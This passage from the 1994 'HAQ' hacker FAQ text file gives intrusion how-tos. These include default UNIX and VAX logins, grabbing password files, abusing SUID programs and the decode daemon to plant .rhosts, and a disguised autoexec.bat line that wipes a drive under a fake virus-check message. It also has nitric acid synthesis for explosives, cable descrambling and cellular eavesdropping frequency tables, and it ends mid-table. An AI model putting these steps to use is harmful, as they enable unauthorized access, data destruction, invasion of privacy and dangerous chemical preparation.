respond to 8N1 (most common setting) but may respond to 7E1,8E2,
7S2, etc.
2. Change baud rates.
3. Send a series of carriage returns.
4. Send a hard break followed by a carriage return.
5. Send control characters. Work from ^a to ^z.
6. Change terminal emulation.
7. Type LOGIN, HELLO, LOG, ATTACH, CONNECT, START, RUN, BEGIN, GO,
LOGON, JOIN, HELP, or anything else you can think off.

=====================================================================
VII. Screwing with the most widespread operating system on the net
(UNIX / AIX Hacking)

WHAT ARE COMMON DEFAULT ACCOUNTS ON UNIX?
(from Belisarius)
Common default accounts are root, admin, sysadmin, unix, uucp, rje,
guest, demo, daemon, sysbin. These accounts may be unpassworded
or the password may possibly be the same (i.e. username uucp has
uucp as the passwd).

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS THE UNIX PASSWORD FILE SETUP?
(from Belisarius)
The password file is usually called /etc/passwd
Each line of the passwd file of a UNIX system follows the following
format:


userid:password:userid#:groupid#:GECOS field:home dir:shell


What each of these fields mean/do---

userid -=> the userid name, entered at login and is what the
login searches the file for. Can be a name or a
number.

password -=> the password is written here in encrypted form.
The encryption is one way only. When a login
occurs the password entered is run through the
encryption algorithm (along with a salt) and then
contrasted to the version in the passwd file that
exists for the login name entered. If they match,
then the login is allowed. If not, the password is
declared invalid.

userid# -=> a unique number assigned to each user, used for
permissions

groupid# -=> similar to userid#, but controls the group the user
belongs to. To see the names of various groups
check /etc/group

GECOS FIELD -=> this field is where information about the user is
stored. Usually in the format full name, office
number, phone number, home phone. Also a good
source of info to try and crack a password.

home dir -=> is the directory where the user goes into
the system at (and usually should be brought
to when a cd is done)

shell -=> this is the name of the shell which is
automatically started for the login

Note that all the fields are separated by colons in the passwd file.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT DO THOSE *s, !s, AND OTHER SYMBOLS MEAN IN THE PASSWD FILE?
(from Belisarius)
Those mean that the password is shadowed in another file. You have
to find out what file, where it is and so on. Ask somebody on your
system about the specifics of the Yellow Pages system, but
discretely!

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS A UNIX TRIPWIRE?
(from Belisarius)
Tripwire is a tool for Unix admins to use to detect password cracker
activity, by checking for changed files, permissions, etc. Good for
looking for trojan horses like password stealing versions of
telnet/rlogin/ypcat/uucp/etc, hidden setuid files, and the like.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

USING SUID/GUID PROGS TO FULL ADVANTAGE.
(from Abort)
A SUID program is a program that when executed has the privs of the
owner.
A GUID has the privs of the group when executed.
Now imagine a few things (which happen often in reality):
1. Someone has a SUID program on their account, it happens to allow
a shell to, like @ or jump to a shell. If it does that, after you
execute said file and then spawn a shell off of it, all you do
in that shell has the privs of that owner.
2. If there is no way to get a shell, BUT they leave the file
writable, just write over it a script that spawns a shell, and you
got their privs again.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I HACK INTO AN AIX MACHINE?
(from Prometheus)

If you can get access to the 'console' AIX machines have a security
hole where you can kill the X server and get a shell with
ctrl-alt-bkspce. Also by starting an xterm up from one you are not
logged in the utmp for that session because the xterms don't do utmp
logging as a default in AIX. Or try the usual UNIX tricks:
ftping /etc/passwd, tftping /etc/passwd, doing a finger and then
trying each of the usernames with that username as a password.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I INCREASE MY DISK QUOTA ON UNIX?
(from Prometheus)

A UNIX disk quota may be increased by finding a directory on another
partition and using that. Find another user who wants more quota and
create a directory for the other to use, one that is world writable.
Once they've put their subdirectory in it, change the perms on the
directory to only read-execute. The reason this works is that
usually accounts are distributed across a couple of filesystems, and
admins are usually too lazy to give users the same quotas on each
filesystem. If the users are all on one filesystem, you may be able
to snag some space from one of the /usr/spool directories by creating
a 'hidden' subdirectory like .debug there, and using that.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I FOOL AROUND ON XTERM / XWINDOWS?
(from Wildgoose)
Most x commands have a -display option which allows you to pick a
terminal to send to. So if you use bitmap to create a bitmap, or
download one, etc then:

xsetroot -bitmap bitmapname
[display the bitmap on your screen]

xsetroot -bitmap bitmapname -display xt2500:0
[display the bitmap on another xterm]

Other uses, try xterm -display xt??:0 will give someone else one of
your login windows to play with. They are then logged in as you
though, and can erase your filespace, etc. Beware!

Slightly irritating:
xclock -geom 1200x1200 -display xt??:0
[fills the entire screen with a clock]

Slightly more irritating:
Use a shell script with xsetroot to flash people's screens different
colors.

On the nastier side:
Use a shell script with xsetroot to kill a person's window manager.

Downright nasty:
Consult the man pages on xkill. It is possible to kill windows on
any display. So to log someone off an xterm you merely have to xkill
their login window.

Protect yourself:
If you use xhost - this will disable other people from being able
to log you out or generally access your terminal.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I TAKE ADVANTAGE OF THE DECODE DAEMON?
(from Caustic)
First, you need to make sure that the decode daemon is active.
Check this by telnetting to the smtp port (usually port 25), and
expanding user Decode. If it gives you something, you can use it.
If it tells you that the user doesn't exist, or whatever, you can't.

If the daemon is active, this is how to exploit the decode daemon:
1) uuencode an echo to .rhosts
2) pipe that into mail, to be sent to the decode daemon
(What happens: the decode daemon (1st) decodes the process, but
leaves the bin priveleges resident. (2nd) the echo command is
executed, because now the decoded message assumes the bin priveleges
[which are *still* active, even though the daemon didn't issue the
command]).
3) If this is done right, you will be able to rlogin to the sysem.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I GET THE PASSWORD FILE IF IT IS SHADOWED?
(from Belisarius)
If your system has Yellow Pages file managment:

ypcat /etc/passwd > whatever.filename

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW IS A PASSWORD ENCRYPTED IN UNIX?
(from UNIX System Security[p.147])
Password encryption on UNIX is based on a modified version of
the DES [Data Encryption Standard]. Contrary to popular belief, the
typed password is not encrypted. Rather the password is used as the
key to encrypt a block of zero-valued bytes.
To begin the encryption, the first seven bits of each character
in the password are extracted to form the 56-bit key. This implies
that no more than eight characters are significant in a password.
Next, the E table is modified using the salt, which is the first two
characters of the encrypted password (stored in the passwd file).
The purpose of the salt is to makae it difficult to use hardware DES
chips or a precomputed list of encrypted passwords to attack the
algorithm. The DES algorithm (with the modified E table) is then
invoked for 25 iterations on the block of zeros. The output of this
encryption, which is 64 bits long, is then coerced into a
64-character alphabet (A-Z, a-z, 0-9, "." and "/"). Because this
coersion involves translations in which several different values are
represented by the same character, password encryption is essentially
one-way; the result cannot be decrypted.

=====================================================================
VIII. Screwing with the most secure operating system on the net
(VAX/VMS Hacking)

WHAT IS VAX/VMS?

VAX: Virtual Address eXtension. Computer is desisgned to use memory
addresses beyond the actual hardware and can therefore run progs
larger than physical memory. Developed by Digital Equipment
Corporation (DEC).

VMS: Virtual Memory System. Also developed by DEC.

DCL: Digital Command Language. Similar to DOS batch language or
UNIX script language.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE DEFAULT VAX LOGINS?
Username Password
-------- --------
DECNET DECNET
DEFAULT DEFAULT
DEMO DEMO
unpassworded
FIELD FIELD
SERVICE
GUEST GUEST
unpassworded
OPERATOR OPERATOR
OPERATIONS OPERATIONS
SYSMAINT SYSMAINT
SERVICE
DIGITAL
SYSTEM SYSTEM
MANAGER
OPERATOR
SYSLIB
SYSTEST UETP
SYSTEST
SYSTEST_CLIG CLIG
SYSTEST
TEST
SUPPORT SUPPORT
DEC

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE SOME OF THE BASIC COMMANDS FROM THE "$" PROMPT?
@: executes a DCL program
usage- @filename.com
ACCOUNTING: program that tracks usage of the system by users
CREATE: PASCAL compiler
usage- CREATE filename.pas
CREATE/DIR: create a subdirectory
DEL: delete files
usage- DEL filename.ext
DIR: list the contents of a directory
options- /FULL = full listing with all security info
/BRIEF = brief listing
* = wildcard for anything
% = wildcard for a specific character
EDIT: VMS editor, requires VT-220 terminal
HELP: brings up help info
LOGOUT: obvious
MAIL: send E-mail locally and to any connected networks
$PASSWORD: change your password
usage- $PASSWORD newpassword
PHONE: chat program
usage- PHONE changes the prompt to a '%', from there type in
the username you wish to talk to. If the user is on a
different node then enter nodename::username
PHOTO: record session
RUN: execute an executable file
SHOW: lets you look at alot of different stuff
usage- SHOW option
options- CLUSTER = VAX cluster, if any
DEFAULT = directory path and device
DEVICES = system devices (drives, modems, etc.)
INTRUSION = accounts being hacked, if any
MEMORY = obvious
NETWORK = network name and VAX's location in it
PROCESS = PROCESS processname shows status
QUOTA = disk space available for account
SYSTEM = system info
DAY = obvious
TIME = obvious
USERS = online users
TYPE: display file on terminal (same as DOS 'type' and UNIX 'cat')
SET FILE/PROTECTION: sets the Read/Write/Execute/Delete flags
usage- SET FILE/PROTECTION=OWNER[RWED] filename.ext
options- WORLD, GROUP, or SYSTEM can be used in place of OWNER
WORLD = all users in your world
GROUP = all users in your group
SYSTEM = all users with SYSPRV privileges
SET TERMINAL: controls terminal settings
usage- SET TERMINAL/option
options- WIDTH=80 = set width to 80 columns
ADVANCED_VIDEO = selects 124x24 lines
NOADVANCED_VIDEO = unselects 124x24 lines
ANSI_CRT = selects ANSI escape sequences
NOANSI_CRT = unselects ANSI escape sequences
AUTOBAUD = allows computer to select highest possible
baud rate
NOAUTOBAUD = turn off automatic baud selection
BROADCAST = allows receipt of SEND, MAIL and PHONE
messages
NOBROADCAST = prevents receiption of SEND, MAIL and
PHONE messages
DEVICE_TYPE=VT220 = set terminal type to VT-220
ECHO = enables echoing from DCL command line
NOECHO = disable DCL command line echoing
FULLDUP = enable full duplex
NOFULLDUP = disable full duplex
HANGUP = log off if no carrier
NOHANGUP = don't log off even if no carrier
INQUIRE = show device type of terminal
PAGE=43 = set display length to 43 lines
TYPE_AHEAD = enable type ahead function
NOTYPE_AHEAD = disable type ahead function
UNKNOWN = use for ASCII device types
WRAP = set wrap around feature
NOWRAP = unset wrap around feature

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT ARE COMMON VAX FILENAME EXTENSIONS?

COMPILER SOURCE CODE FILES
==========================
ADA = ADA compiler source code file
BAS = BASIC compiler source code file
B32 = BLISS-32 compiler source code file
C = C compiler source code file
COB = COBOL compiler source code file
FOR = FORTRAN compiler source code file
MAR = MACRO compiler source code file
PAS = PASCAL compiler source code file
PLI = PL/I compiler source code file
OBJ = object code created by compiler before linking

DCL LANGUAGE FILES
==================
CLD = DCL command description file
COM = DCL batch file

GENERAL FILES
=============
DAT = DATa file
DIR = subDIRectory file
EXE = EXEcutable program
HLP = text for HeLP libraries
LIS = system listing files (TYPE, PRINT, PHOTO)
LOG = batch job output
MEM = DSR output file
RNO = DSR source file
SIXEL = file for SIXEL graphics
SYS = SYStem image file
TJL = Trouble JournaL
TMP = TeMPorary file
TXT = text library input file
UAF = User Autorization File

MAIL FILES
==========
DIS = DIStribution file
MAI = MAIl message file
TXT = mail output file

EDT EDITOR FILES
================
EDT = command file for the EDT editor
JOU = EDT journal when problems occur
TPU = editor command file

=====================================================================
IX. Screwing with the most widespread operating system on PCs
(MS-DOS Hacks)

HOW TO REALLY **ERASE** A HARDDRIVE
(from Amarand)
Install a small program (in the Dos directory would be good) called
Wipe, by Norton Utilities. I am pretty sure that executing this
program, using the proper command line options, you can for one
better than formatting the hard drive. Wiping the information
changes each bit in the object (file, FAT, disk, hard drive) to a
zero...or a random bit, or an alternating bit instead of just
deleting the reference to it in the file allocation table. If you
just delete a file, or format a hard drive...with the new Dos you
would only need to let it run its course and then Unformat the drive.
Wipe, I have found, works much more effectively by first erasing the
file allocation table AFTER erasing the information the file
allocation table is used to find.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WRITING A .bat FILE TO 'WIPE' A DRIVE.
Add the following code to the end of autoexec.bat:
echo Please wait
echo Checking HardDisk for virii, this make take a while ...
wipe > nothing.txt

This prevents any output from Wipe being output.

=====================================================================
X. Finding out what that encrypted info is
(Cracking programs)

WHAT ARE PASSWORD CRACKING PROGRAMS?
(from Belisarius)
There are three main cracking programs. They are Crack, Cracker Jack
and Cops. The latest versions are 4.1 for Crack and 1.4 for Cracker
Jack. Crack and COPS run on UNIX and CJack runs on a PC. CJack1.3
runs on any x86 class and CJack1.4 needs at least a 386. To use any
of these requires access to an unshadowed password file.
They are not programs that try to login to an account. They take the
password file (/etc/passwd in UNIX is usually the name) and guess the
passwords.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET THESE PROGRAMS?

Crack: ftp.virginia.edu /pub/security
CrackerJack: bnlux1.bnl.gov /pub/pezz
COPS:

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS WPCRACK?
WPCRAK is a cracker to break the encryption on WordPerfect files.
It works, but takes a long time to run.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHAT IS PKCRACK?
PKCRACK is a dictionary cracker for PKZIP. It works. It's
dictionary, but it works. Not all that well, as you may have to sift
through multiple possible passwords, but its better than nothing.

=====================================================================
XI. How do I keep my info secure
(PGP / Cryptology)

WHAT IS PGP?
(from Belisarius)
PGP stands for Pretty Good Protection, from a company called Pretty
Good Software. It is a public key encryption program for MS-DOS,
Unix, and Mac. You create a key pair. One private (secret) key
and a public key. The keys are different parts of the whole. I
distribute my public key and anyone who wants can grab it ad it to
their PGP keyring. Then when they want to send me a message they
encrypt it with PGP and my public key and then send it. Only I can
decrypt it because you need my secret key to decode it. (Trust me
you won't get my secret key) That is PGP. Please use it if you
want to communicate anything of a ahhhh....sensitive manner.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

WHERE CAN I GET PGP?
(from an archie search)

FTP sites for PGP=Pretty Good Privacy Public Encryption System
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

========
Unix PGP
========

Host 130.149.17.7
Location: /pub/local/ini/security
FILE -rw-rw-r-- 651826 Apr 5 1993 pgp22.tar.Z

Host arthur.cs.purdue.edu
Location: /pub/pcert/tools/unix/pgp
FILE -r--r--r-- 651826 Mar 7 1993 pgp22.tar.Z

Host coombs.anu.edu.au
Location: /pub/security/cypher
FILE -r--r--r-- 651826 Nov 4 22:28 pgp22.tar.Z



==========
MS-DOS PGP
==========

Host zero.cypher.com
Location: /pub/pgp
FILE pgp23a.zip

================
MS-DOS PGP SHELL
================

Host athene.uni-paderborn.de
Location: /pcsoft/msdos/security
FILE -rw-r--r-- 65160 Aug 9 20:00 pgpshe22.zip

Host nic.switch.ch
Location: /mirror/msdos/security
FILE -rw-rw-r-- 65160 Aug 9 22:00 pgpshe22.zip

Host plains.nodak.edu
Location: /pub/aca/msdos/pgp
FILE -rw-r--r-- 65430 Nov 26 18:28 pgpshe22.zip


=======
Mac PGP
=======

Host plaza.aarnet.edu.au
Location: /micros/mac/info-mac/util
FILE -r--r--r-- 323574 Apr 26 1993 pgp.hqx

Host sics.se
Location: /pub/info-mac/util
FILE -rw-rw-r-- 323574 Nov 5 11:20 pgp.hqx

Host sumex-aim.stanford.edu
Location: /info-mac/util
FILE -rw-r--r-- 323574 Apr 26 1993 pgp.hqx

=====================================================================
XII. Chemistry 101
(explosive/pyrotechnic component prep)
XIII. Fun things with solder, wires, and parts
(Underground electronics)
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)
XV. What's on the radio waves?
(Radios and Scanning)

HOW TO MAKE NITRIC ACID:
(from Neurophire)

Nitric acid is not TOO expensive, but is hard to find except from
chemical supply houses. Purchases can be traced.(From TBBOM13.TXT)

There are several ways to make this most essential of all acids for
explosives. One method by which it could be made will be presented.
again, be reminded that these methods SHOULD NOT BE CARRIED OUT!!

Materials: Equipment:
---------- ----------
sodium nitrate or adjustable heat source
potassium nitrate
retort
distilled water
ice bath
concentrated
sulfuric acid stirring rod

collecting flask with
stopper

1) Pour 32 milliliters of concentrated sulfuric acid into the retort.

2) Carefully weigh out 58 grams of sodium nitrate, or 68 grams of
potassium nitrate. and add this to the acid slowly. If it all does
not dissolve, carefully stir the solution with a glass rod until
it does.

3) Place the open end of the retort into the collecting flask, and
place the collecting flask in the ice bath.

4) Begin heating the retort, using low heat. Continue heating until
liquid begins to come out of the end of the retort. The liquid that
forms is nitric acid. Heat until the precipitate in the bottom of
the retort is almost dry, or until no more nitric acid is forming.
CAUTION: If the acid is heated too strongly, the nitric acid will
decompose as soon as it is formed. This can result in the
production of highly flammable and toxic gasses that may explode.
It is a good idea to set the above apparatus up, and then get away
from it.

Potassium nitrate could also be obtained from store-bought black
powder, simply by dissolving black powder in boiling water and
filtering out the sulfur and charcoal. To obtain 68 g of potassium
nitrate, it would be necessary to dissolve about 90 g of black powder
in about one liter of boiling water. Filter the dissolved solution
through filter paper in a funnel into a jar until the liquid that
pours through is clear. The charcoal and sulfur in black powder are
insoluble in water, and so when the solution of water is allowed to
evaporate, potassium nitrate will be left in the jar.

=====================================================================
XIII. Fun things with solder, wires, and parts
(Underground electronics)

HOW TO MAKE HIGH FREQUENCY TONES TO ANNOY SOMEONE?
(from Angel of Death with Belisarius)

The idea is to make a simple timing circuit to create a high freq
tone. The timing circuit is based upon the 555-chip and uses a
simple speaker to convert the pulses from the 555 into sound.

Required materials: 555 timer chip, 9 V battery, .01 uF capacitor,
100k potentiometer, tweeter speaker, wire
(the capacitor and resistor values can vary
although that changes the possible freqs)


-9V (GND)
[\ |
[s\ | ________ ________
[p \ | | \/ |
[e +-------+-------------------+--| 1 8 |-- +9V
[a | | | |
[k | | | /.01uF CAP | 5 |
[e +-+ +--|(------+-----------| 2 5 7 |
[r / | | \ | | 5 |
[ / | | | |
[/ +--------------- | ----------| 3 t 6 |----+
| | | i | |
| | | m | |
| | +9V --| 4 e 5 | |
| | | r | |
| | |__________________| |
| | |
| /\ | |
+----\ / \-----+-----------------------------------+
\/ 100k POT

555 Timer Pin Connections
-------------------------
Pin 1: Ground (-9V side of bat), one lead of tweeter, one lead
of capacitor
Pin 2: Pin 6 and other lead of capacitor
Pin 3: Other lead of the tweeter, one lead of the resistor
Pin 4: Pin 8 and the +9V
Pin 5: No connections
Pin 6: Pin 2 and the other lead of the potentiometer
Pin 7: No connections
Pin 8: Pin 4 and the +9V

=====================================================================
XIV. Watching television
(cable, Pay-Per-View(PPV), scrambling)

HOW IS CABLE TV SCRAMBLED?
(from Aero)

There are three main types of scrambling for cable TV: trap filters,
gernaral scrambling and addressable scrambling.

1. Trap filters. Located in the distribution box and physically
prevent the desired channel from reaching your house. All you see
when this techniques is used is theoretically static (i.e. a blank
channel). No filter is perfect, so some signal may reach your TV.
This is an older system of cable protection, and it is easy to bypass
(go out to the box and remove the filter).

2. General scrambling. This system scrambles the pay channels (all
the channels before they reach the box), and you need a special
decoder to unscramble them. The most common method of scambling is
to remove the sync signal. This is also easy to get around as you
can buy descramblers.

3. Addressable descramblers. The cable box receives the scrambled
channels, but the cable company sends signals to the box telling it
which ones should be unscrambled. This is the system used by most
pay-per-view systems. This is a little harder to defeat, but not too
bad if you have the right equipment/friends.

-=-=-=-=-=-=-=-=-=-=-=-=-=- END of THE HAQ2.07/2 -=-=-=-=-=-=-=-=-=-=-=-

**


Jun 13, 1994 19:54 from Belisarius


_____________
/ / / *** *** ****** ******
/ *** *** ********* *********
/ / *** *** *** *** *** ***
/ / *********** *********** *** ***
/ /_____ ______ *********** *********** *** ** ***
/ / / /_____/ *** *** *** *** *** *****
/ / / / *** *** *** *** ***********
/ / / /______ *** *** *** *** ***** ***


+---------------+
| THE HAQ |
| Edition 2.07 |
| 11 JUN 1994 |
+---------------+

File 3 of 3

=====================================================================
XV. Tuning in to what's on the radio waves
(Radios and Scanning)

WHAT DO I NEED TO START SCANNING?
There are to type of main scanner types (determined by the method of
radio reception): either crystal or programmable(synthetic) tuning.
Crystal tuning requires a specific crystal for each desired freq, at



====== ===============
1 46.610
2 46.630
3 46.670
4 46.710
5 46.730
6 46.770
7 46.830
8 46.870
9 46.930
10 46.970

The range on cordless phones is usually only a block or two. To
monitor someones calls use a small portable scanner and cassette
recorder and you will have a tape of all their calls.

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

HOW CAN I SCAN CELLULAR PHONE CONVERSATIONS?
Cellular telephones are a great source of info as they are used by
doctors, lawyers, and other big business. They are also a great
source of calling card numbers.

Cellular phones operate on a very simple premise. They receive on
one frequency and transmit on another freq in order to allow
simultaneous communication. The area is split into two bands
(Band A and Band B) which are split into 21 cells (hence the name
cellular) and each cell has 16 channels within it.

Cellular arrangment:


______ ______
/ \ / \
/ \ / \
/ Cell \______/ Cell \______
\ #1 / \ #5 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #3 / \ #7 /
/ \ / \ /
/ Cell \______/ Cell \______/
\ #2 / \ #6 / \
\ / \ / \
\______/ Cell \______/ Cell \
/ \ #4 / \ #8 /

Band A uses channels 1-333 and Band B uses channels 334-666. Usually
the first channel in each cell is the Data Channel (333 for Cell 1A,
331 for Cell 2A, etc.). There are simple formulas to calculate the
frequency for receive and transmit for each channel.

Transmit freq = (channel number * .030 MHz) + 870 MHz

Receive freq = (channel number * .030 MHz) + 825 MHz

So for Channel 333: T=879.990 MHz and R=834.990 MHz


FOR BAND A
==========
Cell #
Chan 1 2 3 4 5 6 7

1 333 332 331 330 329 328 327
879.990 879.960 879.930 879.900 879.870 879.840 879.810
834.990 834.960 834.930 834.900 834.870 834.840 834.810

2 312 311 310 309 308 307 306
879.360 879.330 879.300 879.270 879.240 879.210 879.180
834.360 834.330 834.300 834.270 834.240 834.210 834.180

3 291 290 289 288 287 286 285
878.730 878.700 878.670 878.640 878.610 878.580 878.550
833.730 833.700 833.670 833.640 833.610 833.580 833.550

4 270 269 268 267 266 265 264
878.100 878.070 878.040 878.010 877.980 877.950 877.920
833.100 833.070 833.040 833.010 832.980 832.950 832.920

5 249 248 247 246 245 244 243
877.470 877.440 877.410 877.380 877.350 877.320 877.290
832.470 832.440 832.410 832.380 832.350 832.320 832.290

6 228 227 226 225 224 223 222
876.840 876.810 876.780 876.750 876.720 876.690 876.660
831.840 831.810 831.780 831.750 831.720 831.690 831.660

7 207 206 205 204 203 202 201
876.210 876.180 876.150 876.120 876.090 876.060 876.030
831.210 831.180 831.150 831.120 831.090 831.060 831.030

8 186 185 184 183 182 181 180
875.580 875.550 875.520 875.490 875.460 875.430 875.400
830.580 830.550 830.520 830.490 830.460 830.430 830.400

9 165 164 163 162 161 160 159
874.950 874.920 874.890 874.860 874.830 874.800 874.770
829.950 829.920 829.890 829.860 829.830 829.800 829.770

10 144 143 142 141 140 139 138
874.320 874.290 874.260 874.230 874.200 874.170 874.140
829.320 829.290 829.260 829.230 829.200 829.170 829.140

11 123 122 121 120 119 118 117
873.690 873.660 873.630 873.600 873.570 873.540 873.510
828.690 828.660 828.630 828.600 828.570 828.540 828.510

12 102 101 100 99 98 97 96
873.060 873.030 873.000 872.970 872.940 872.910 872.880
828.060 828.030 828.000 827.970 827.940 827.910 827.880

13 81 80 79 78 77 76 75
872.430 872.400 872.370 872.340 872.310 872.280 872.250
827.430 827.400 827.370 827.340 827.310 827.280 827.250

14 60 59 58 57 56 55 54
871.800 871.770 871.740 871.710 871.680 871.650 871.620
826.800 826.770 826.740 826.710 826.680 826.650 826.620

15 39 38 37 36 35 34 33
871.170 871.140 871.110 871.080 871.050 871.020 870.990
826.170 826.140 826.110 826.080 826.050 826.020 825.990

16 18 17 16 15 14 13 12
870.540 870.510 870.480 870.450 870.420 870.390 870.360
825.540 825.510 825.480 825.450 825.420 825.390 825.360


Cell #
Chan 8 9 10 11 12 13 14

1 326 325 324 323 322 321 320
879.780 879.750 879.720 879.690 879.660 879.630 879.600
834.780 834.750 834.720 834.690 834.660 834.630 834.600

2 305 304 303 302 301 300 299
879.150 879.120 879.090 879.060 879.030 879.000 878.970
834.150 834.120 834.090 834.060 834.030 834.000 833.970

3 284 283 282 281 280 279 278
878.520 878.490 878.460 878.430 878.400 878.370 878.340
833.520 833.490 833.460 833.430 833.400 833.370 833.340

4 263 262 261 260 259 258 257
877.890 877.860 877.830 877.800 877.770 877.740 877.710
832.890 832.860 832.830 832.800 832.770 832.740 832.710

5 242 241 240 239 238 237 236
877.260 877.230 877.200 877.170 877.140 877.110 877.080
832.260 832.230 832.200 832.170 832.140 832.110 832.080

6 221 220 219 218 217 216 215
876.630 876.600 876.570 876.540 876.510 876.480 876.450
831.630 831.600 831.570 831.540 831.510 831.480 831.450

7 200 199 198 197 196 195 194
876.000 875.970 875.940 875.910 875.880 875.850 875.820
831.000 830.970 830.940 830.910 830.880 830.850 830.820

8 179 178 177 176 175 174 173
875.370 875.340 875.310 875.280 875.250 875.220 875.190
830.370 830.340 830.310 830.280 830.250 830.220 830.190

9 158 157 156 155 154 153 152
874.740 874.710 874.680 874.650 874.620 874.590 874.560
829.740 829.710 829.680 829.650 829.620 829.590 829.560

10 137 136 135 134 133 132 131
874.110 874.080 874.050 874.020 873.990 873.960 873.930
829.110 829.080 829.050 829.020 828.990 828.960 828.930

11 116 115 114 113 112 111 110
873.480 873.450 873.420 873.390 873.360 873.330 873.300
828.480 828.450 828.420 828.390 828.360 828.330 828.300

12 95 94 93 92 91 90 89
872.850 872.820 872.790 872.760 872.730 872.700 872.670
827.850 827.820 827.790 827.760 827.730 827.700 827.670

13 74 73 72 71 70 69 68
872.220 872.190 872.160 872.130 872.100 872.070 872.040
827.220 827.190 827.160 827.130 827.100 827.070 827.040

14 53 52 51 50 49 48 47
871.590 871.560 871.530 871.500 871.470 871.440 871.410
826.590 826.560 826.530 826.500 826.470 826.440 826.410

15 32 31 30 29 28 27 26
870.960 870.930 870.900 870.870 870.840 870.810 870.780
825.960 825.930 825.900 825.870 825.840 825.810 825.780

16 11 10 9 8 7 6 5
870.330 870.300 870.270 870.240 870.210 870.180 870.150
825.330 825.300 825.270 825.240 825.210 825.180 825.150


Cell #
Chan 15 16 17 18 19 20 21

1 319 318 317 316 315 314 313
879.570 879.540 879.510 879.480 879.450 879.420 879.390
834.570 834.540 834.510 834.480 834.450 834.420 834.390

2 298 297 296 295 294 293 292
878.940 878.910 878.880 878.850 878.820 878.790 878.760
833.940 833.910 833.880 833.850 833.820 833.790 833.760

3 277 276 275 274 273 272 271
878.310 878.280 878.250 878.220 878.190 878.160 878.130
833.310 833.280 833.250 833.220 833.190 833.160 833.130

4 256 255 254 253 252 251 250
877.680 877.650 877.620 877.590 877.560 877.530 877.500
832.680 832.650 832.620 832.590 832.560 832.530 832.500

5 235 234 233 232 231 230 229
877.050 877.020 876.990 876.960 876.930 876.900 876.870
832.050 832.020 831.990 831.960 831.930 831.900 831.870

6 214 213 212 211 210 209 208
876.420 876.390 876.360 876.330 876.300 876.270 876.240
831.420 831.390 831.360 831.330 831.300 831.270 831.240

7 193 192 191 190 189 188 187
875.790 875.760 875.730 875.700 875.670 875.640 875.610
830.790 830.760 830.730 830.700 830.670 830.640 830.610

8 172 171 170 169 168 167 166
875.160 875.130 875.100 875.070 875.040 875.010 874.980
830.160 830.130 830.100 830.070 830.040 830.010 829.980

9 151 150 149 148 147 146 145
874.530 874.500 874.470 874.440 874.410 874.380 874.350
829.530 829.500 829.470 829.440 829.410 829.380 829.350

10 130 129 128 127 126 125 124
873.900 873.870 873.840 873.810 873.780 873.750 873.720
828.900 828.870 828.840 828.810 828.780 828.750 828.720

11 109 108 107 106 105 104 103
873.270 873.240 873.210 873.180 873.150 873.120 873.090
828.270 828.240 828.210 828.180 828.150 828.120 828.090

12 88 87 86 85 84 83 82
872.640 872.610 872.580 872.550 872.520 872.490 872.460
827.640 827.610 827.580 827.550 827.520 827.490 827.460

13 67 66 65 64 63 62 61
872.010 871.980 871.950 871.920 871.890 871.860 871.830
827.010 826.980 826.950 826.920 826.890 826.860 826.830

14 46 45 44 43 42 41 40
871.380 871.350 871.320 871.290 871.260 871.230 871.200
826.380 826.350 826.320 826.290 826.260 826.230 826.200

15 25 24 23 22 21 20 19
870.750 870.720 870.690 870.660 870.630 870.600 870.570
825.750 825.720 825.690 825.660 825.630 825.600 825.570

16 4 3 2 1
870.120 870.090 870.060 870.030
825.120 825.090 825.060 825.030


FOR BAND B
==========

Cell #
Chan 1 2 3 4 5 6 7

1 334 335 336 337 338 339 340
